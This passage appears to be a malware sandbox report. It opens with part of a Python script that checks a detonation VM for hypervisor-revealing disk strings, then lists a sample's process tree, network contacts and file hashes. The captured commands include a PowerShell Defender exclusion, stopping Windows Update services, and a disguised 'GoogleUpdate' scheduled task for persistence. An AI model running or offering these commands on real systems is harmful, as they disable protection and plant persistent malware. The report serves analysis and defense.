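    r"^(?P<cls>[^&]+)&Ven_(?P<ven>[^&]*)&Prod_(?P<prod>[^&]*)(?:&Rev_(?P<rev>[^&]*))?$", re.I
)


@dataclass(frozen=True)
class ScsiDevice:
    device_class: str
    vendor: str
    product: str
    revision: Optional[str]


def _decode(raw: Optional[str]) -> Optional[str]:
    return None if raw is None else raw.replace("_", " ").strip()


def parse_scsi_id(subkey: str) -> Optional[ScsiDevice]:
    """Decode one Enum\\SCSI subkey name; None if it is not a device ID."""
    m = SCSI_ID_RE.match(subkey)
    if not m:
        return None
    return ScsiDevice(m["cls"], _decode(m["ven"]), _decode(m["prod"]), _decode(m["rev"]))


def hypervisor_markers(dev: ScsiDevice) -> Tuple[str, ...]:
    text = f"{dev.vendor} {dev.product}".lower()
    return tuple(mk for mk in HYPERVISOR_MARKERS if mk in text)


def virtual_disks(subkeys: List[str]) -> List[Tuple[str, Tuple[str, ...]]]:
    """Subkeys whose vendor/product strings would tip off an evasive sample, with the markers hit."""
    hits = []
    for name in subkeys:
        dev = parse_scsi_id(name)
        if dev is not None:
            markers = hypervisor_markers(dev)
            if markers:
                hits.append((name, markers))
    return hits


def live_scsi_subkeys(path: str = r"SYSTEM\CurrentControlSet\Enum\SCSI") -> List[str]:
    """Enumerate the real key on a Windows host (the read the sample performs); empty elsewhere."""
    if winreg is None:
        return []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
        count = winreg.QueryInfoKey(key)[0]
        return [winreg.EnumKey(key, i) for i in range(count)]


# Constructed sample: one bare-metal SSD plus disks as VMware, VirtualBox and QEMU expose them.
SAMPLE_SUBKEYS = [
    "Disk&Ven_&Prod_Samsung_SSD_870",
    "Disk&Ven_VMware&Prod_Virtual_disk",
    "Disk&Ven_VBOX&Prod_HARDDISK",
    "CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM",
]

if __name__ == "__main__":
    keys = live_scsi_subkeys() or SAMPLE_SUBKEYS
    for name, markers in virtual_disks(keys):
        print(f"{name}: would be flagged ({', '.join(markers)})")
```

Run on the detonation image itself, any hit from `virtual_disks` is a disk whose inquiry strings should be changed in the hypervisor configuration before re-running samples that carry this check; an empty result means this particular probe would pass, though the report shows the same payloads also read the Geo\Nation value and the firmware-visible storage enumeration, which this example does not cover.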
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
| N/A | N/A | N/A | N/A |
(61 further rows of this table, one per additional process-enumeration event, contained no extracted description, indicator, process or target and are collapsed here.)
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe
"C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe"
C:\Users\Admin\AppData\Local\Temp\9630.exe
C:\Users\Admin\AppData\Local\Temp\9630.exe
C:\Users\Admin\AppData\Local\Temp\9438.exe
C:\Users\Admin\AppData\Local\Temp\9438.exe
C:\Users\Admin\AppData\Local\Temp\A04F.exe
C:\Users\Admin\AppData\Local\Temp\A04F.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp" /SL5="$6011E,8423542,54272,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Program Files (x86)\xrecode3\xrecode3.exe
"C:\Program Files (x86)\xrecode3\xrecode3.exe" -i
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Query
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Program Files (x86)\xrecode3\xrecode3.exe
"C:\Program Files (x86)\xrecode3\xrecode3.exe" -s
C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 1
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| RU | 81.19.131.34:80 | 81.19.131.34 | tcp |
| US | 8.8.8.8:53 | 34.131.19.81.in-addr.arpa | udp |
| RU | 185.172.128.19:80 | 185.172.128.19 | tcp |
| US | 8.8.8.8:53 | 19.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| RU | 81.19.131.34:80 | 81.19.131.34 | tcp |
| MD | 176.123.7.190:32927 | | tcp |
| US | 8.8.8.8:53 | 190.7.123.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
Files
memory/4852-0-0x0000000000400000-0x000000000040B000-memory.dmp
memory/3384-1-0x0000000000880000-0x0000000000896000-memory.dmp
memory/4852-3-0x0000000000400000-0x000000000040B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9630.exe
| MD5 | f88edad62a7789c2c5d8047133da5fa7 |
| SHA1 | 41b1f056cdda764a1c7c402c6fa4f8ab2f3ce5f9 |
| SHA256 | eb2b1ce5574096b91eb9e0482117d2518ab188c0747a209dc77e88d30bb970dc |
| SHA512 | e2d5b0ace5dfd3bd2321b2a42b7e7725071ca440389dc5ef12720a34727ae84c2907cd7befeae5d53568d9deaee8443f4cbda44b598cfc9b6316d9389be09a60 |
C:\Users\Admin\AppData\Local\Temp\9438.exe
| MD5 | d0c59443e41e1160209139841fa39c9f |
| SHA1 | 76be0077ce9dc5ef6756b8c202a6d5d94c759535 |
| SHA256 | de3b8eeffa2d3ce30a578af1de877afd5831e428ca7c0767933d6e6af9ac815c |
| SHA512 | d954cd9752d04a8d182377505e5c9a9f942425daf99301e3a136d1dca7565d8b181485d08852194c1b9152752b75824ce55c052d3697bf0c54e48dfb56332f28 |
memory/4540-16-0x0000000074460000-0x0000000074C10000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\A04F.exe
| MD5 | 91d23595c11c7ee4424b6267aabf3600 |
| SHA1 | ef161bb8e90cebdf81f4e53dfccb50c1f90a9a02 |
| SHA256 | d58937d468f6ca92b12ee903a16a4908de340f64f894cf7f1c594cd15c0c7e47 |
| SHA512 | cb9ed75c14e7b093cabab66c22d412371c639ace31fbe976c71ffec6007bf85b3d7d3e591fe5612e2a035298398d32e1aa7dc0d753f93328ebc2ce8e44fb8d2b |
memory/844-21-0x0000000074460000-0x0000000074C10000-memory.dmp
memory/844-22-0x0000000000BE0000-0x0000000000C1C000-memory.dmp
memory/4540-23-0x0000000000370000-0x0000000001826000-memory.dmp
memory/844-24-0x0000000007F40000-0x00000000084E4000-memory.dmp
memory/844-25-0x0000000007A30000-0x0000000007AC2000-memory.dmp
memory/844-27-0x0000000007B70000-0x0000000007B80000-memory.dmp
memory/844-28-0x00000000079C0000-0x00000000079CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 77471d919a5e2151fb49f37c315af514 |
| SHA1 | 0687047ed80aa348bdc1657731f21181995b654c |
| SHA256 | 52666594a3e8bd7ac277411e215e1f65a7771f7c1d5b00a9e6ec95fade64f1f1 |
| SHA512 | 6ffb45e79b03bac2820c98503793cd11c13803f49522eea9334c4c6cd05384dda3a60b0a8a8f363abc439ad444f1a8da290f0350fa69b75b6c3c9701177f8844 |
memory/844-41-0x0000000008B10000-0x0000000009128000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | cde750f39f58f1ec80ef41ce2f4f1db9 |
| SHA1 | 942ea40349b0e5af7583fd34f4d913398a9c3b96 |
| SHA256 | 0a434be25f55f27ce0adbdfb08efeac1da01125b3e9194a94669bc7e9c6fe094 |
| SHA512 | c181faacbef70f8a91606943470af50cfd443958c48601051371ff5d9bf66bb9ec794571b05a347a7f5776f06484dc007f535591d2f5e1c57e3c0ee04f3e9580 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | f81be07058935d224ab3843bff94fec0 |
| SHA1 | 1a7360901f8cb5017f7a41ca1a6984227b712b16 |
| SHA256 | 8d4df79cf6bf1cb8285b7358a7c6d92c7f665065999934b24c1175311d99fb6c |
| SHA512 | 342b2c767af972819c57091e9d9d65578522fa48549b6c40aad6791b0c65e186b377e3f095458e8b5d873ffdadd73897252a13bead652bd74a09540d2c27c96e |
memory/844-55-0x0000000007D80000-0x0000000007E8A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 1f40433778e799319ae0ece36d28f00f |
| SHA1 | 4ce947e15182e61e379fbfbf52b6625cb0528c69 |
| SHA256 | 1d360b097bfd95b5e6312350928af25631973ff1ddfce7835ac5c8b239b9e58c |
| SHA512 | 30e0d4d61dd4535f7e09a0e0d49691dbb9f99ed54f01b4b898eb786b466cdba34e170677887831daa5e6f98bf2f0d8ca7729a2bf7949ee0ac043a617b419030f |
memory/844-66-0x0000000007B30000-0x0000000007B42000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\latestX.exe
| MD5 | bae29e49e8190bfbbf0d77ffab8de59d |
| SHA1 | 4a6352bb47c7e1666a60c76f9b17ca4707872bd9 |
| SHA256 | f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87 |
| SHA512 | 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2 |
C:\Users\Admin\AppData\Local\Temp\Broom.exe
| MD5 | 00e93456aa5bcf9f60f84b0c0760a212 |
| SHA1 | 6096890893116e75bd46fea0b8c3921ceb33f57d |
| SHA256 | ff3025f9cf19323c5972d14f00f01296d6d7a71547eca7e4016bfd0e1f27b504 |
| SHA512 | abd2be819c7d93bd6097155cf84eaf803e3133a7e0ca71f9d9cbc3c65e4e4a26415d2523a36adafdd19b0751e25ea1a99b8d060cad61cdfd1f79adf9cd4b4eca |
memory/844-79-0x0000000007CB0000-0x0000000007CEC000-memory.dmp
memory/4700-81-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4540-84-0x0000000074460000-0x0000000074C10000-memory.dmp
memory/1344-85-0x0000000000B50000-0x0000000000B51000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp
| MD5 | 5525670a9e72d77b368a9aa4b8c814c1 |
| SHA1 | 3fdad952ea00175f3a6e549b5dca4f568e394612 |
| SHA256 | 1180706added2a7899f08f25a9f88ecff5d003ba8964f918d00779565e4a6978 |
| SHA512 | 757249f7e67f82522a8e3079a22c5cf92111626446a32ad3ef876f23885f62d1bb5bf3238d564e23531d062fe18742568dfc00e33b049bb8eef05eb953ef981a |
memory/844-89-0x0000000007CF0000-0x0000000007D3C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-GMI39.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
memory/4880-104-0x0000000002100000-0x0000000002101000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-GMI39.tmp\_isetup\_isdecmp.dll
| MD5 | a813d18268affd4763dde940246dc7e5 |
| SHA1 | c7366e1fd925c17cc6068001bd38eaef5b42852f |
| SHA256 | e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64 |
| SHA512 | b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4 |
memory/4840-109-0x0000000002A70000-0x0000000002E6A000-memory.dmp
memory/4700-110-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4840-214-0x0000000002E70000-0x000000000375B000-memory.dmp
memory/1344-233-0x0000000000400000-0x0000000000965000-memory.dmp
C:\Program Files (x86)\xrecode3\xrecode3.exe
| MD5 | aa9f5a4dbd05ae5fbefe5cea48f2f355 |
| SHA1 | ea851b9f6521875a8a550d9c788bd11750ae6151 |
| SHA256 | 0f01b2ad6d8723a6d2195080d2fba1eb2e853510828e27c47299efa34956ef02 |
| SHA512 | dfb39816d508dba9a3ac74d6c27829e8415c39482f6de21171767f3f1fcddc0cf443608b1ca0e4c45ce0241c7ebffa4c324701d73e207917181671ae6f6ff521 |
memory/3332-239-0x00007FF679FE0000-0x00007FF67A581000-memory.dmp
memory/4840-241-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2132-243-0x0000000000400000-0x0000000000785000-memory.dmp
memory/2132-242-0x0000000000400000-0x0000000000785000-memory.dmp
memory/2132-246-0x0000000000400000-0x0000000000785000-memory.dmp
memory/2132-247-0x0000000000400000-0x0000000000785000-memory.dmp
memory/844-248-0x0000000074460000-0x0000000074C10000-memory.dmp
memory/4632-249-0x00000000009D0000-0x0000000000AD0000-memory.dmp
memory/4632-250-0x00000000023E0000-0x00000000023E9000-memory.dmp
memory/3356-251-0x0000000000400000-0x0000000000409000-memory.dmp
memory/4880-254-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/844-255-0x0000000007B70000-0x0000000007B80000-memory.dmp
memory/3356-257-0x0000000000400000-0x0000000000409000-memory.dmp
memory/4028-258-0x0000000000400000-0x0000000000785000-memory.dmp
memory/4840-259-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/3384-261-0x00000000020E0000-0x00000000020F6000-memory.dmp
memory/3356-262-0x0000000000400000-0x0000000000409000-memory.dmp
memory/844-266-0x0000000007ED0000-0x0000000007F36000-memory.dmp
memory/1344-267-0x0000000000400000-0x0000000000965000-memory.dmp
memory/1344-269-0x0000000000B50000-0x0000000000B51000-memory.dmp
memory/3664-270-0x0000000003230000-0x0000000003266000-memory.dmp
memory/3664-271-0x0000000074460000-0x0000000074C10000-memory.dmp
memory/3664-272-0x0000000005420000-0x0000000005430000-memory.dmp
memory/4880-273-0x0000000002100000-0x0000000002101000-memory.dmp
memory/844-274-0x0000000009400000-0x00000000095C2000-memory.dmp
memory/4840-275-0x0000000002A70000-0x0000000002E6A000-memory.dmp
memory/3664-278-0x0000000005A60000-0x0000000006088000-memory.dmp
memory/844-277-0x0000000009B00000-0x000000000A02C000-memory.dmp
memory/3664-276-0x0000000005420000-0x0000000005430000-memory.dmp
memory/3664-279-0x0000000006090000-0x00000000060B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hda52irk.xjc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3664-285-0x0000000006130000-0x0000000006196000-memory.dmp
memory/3664-290-0x0000000006380000-0x00000000066D4000-memory.dmp
memory/3664-291-0x00000000067C0000-0x00000000067DE000-memory.dmp
memory/4028-293-0x0000000000400000-0x0000000000785000-memory.dmp
memory/4840-294-0x0000000002E70000-0x000000000375B000-memory.dmp
memory/3664-295-0x0000000006D80000-0x0000000006DC4000-memory.dmp
memory/4840-296-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/3664-299-0x0000000005420000-0x0000000005430000-memory.dmp
memory/3664-300-0x0000000007B70000-0x0000000007BE6000-memory.dmp
memory/3664-301-0x0000000008270000-0x00000000088EA000-memory.dmp
memory/3664-302-0x0000000007BF0000-0x0000000007C0A000-memory.dmp
memory/3332-303-0x00007FF679FE0000-0x00007FF67A581000-memory.dmp
memory/4840-304-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2724-305-0x000001A87B790000-0x000001A87B7B2000-memory.dmp
memory/2724-306-0x00007FFAFD8F0000-0x00007FFAFE3B1000-memory.dmp
memory/4028-307-0x0000000000400000-0x0000000000785000-memory.dmp
memory/2724-317-0x000001A87B3C0000-0x000001A87B3D0000-memory.dmp
memory/2724-318-0x000001A87B3C0000-0x000001A87B3D0000-memory.dmp
memory/3664-320-0x0000000007DB0000-0x0000000007DE2000-memory.dmp
memory/3664-321-0x0000000070AD0000-0x0000000070B1C000-memory.dmp
memory/3664-322-0x000000006C1C0000-0x000000006C514000-memory.dmp
memory/3664-332-0x0000000007D90000-0x0000000007DAE000-memory.dmp
memory/3664-333-0x0000000007DF0000-0x0000000007E93000-memory.dmp
memory/2724-334-0x000001A87B3C0000-0x000001A87B3D0000-memory.dmp
memory/3664-335-0x0000000007EE0000-0x0000000007EEA000-memory.dmp
memory/844-336-0x0000000009820000-0x0000000009870000-memory.dmp
memory/2724-337-0x000001A87B3C0000-0x000001A87B3D0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e243a38635ff9a06c87c2a61a2200656 |
| SHA1 | ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc |
| SHA256 | af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f |
| SHA512 | 4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4 |
memory/4840-367-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/3332-370-0x00007FF679FE0000-0x00007FF67A581000-memory.dmp
memory/3332-377-0x00007FF679FE0000-0x00007FF67A581000-memory.dmp
memory/4028-379-0x0000000000400000-0x0000000000785000-memory.dmp